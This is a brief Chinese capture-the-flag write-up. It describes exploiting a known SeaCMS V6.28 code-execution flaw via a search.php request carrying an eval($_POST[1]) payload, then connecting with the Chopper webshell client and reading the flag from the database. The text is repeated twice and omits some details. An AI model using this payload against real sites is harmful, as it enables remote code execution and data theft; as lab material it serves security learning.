题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
海洋CMS V6.28代码执行0day
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
反手去查了一下海洋cms的数据库配置文件的存放地址:
出去用菜刀连接数据库
编辑完成后右键数据库管理,可以看到flag了
题目在i春秋ctf训练营
又是一道cms的通用漏洞的题,直接去百度查看通用漏洞
这里我使用的是以下这个漏洞:
按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1])
之后用菜刀连接,但乍一看并没有flag.php
反手去查了一下海洋cms的数据库配置文件的存放地址:
出去用菜刀连接数据库
编辑完成后右键数据库管理,可以看到flag了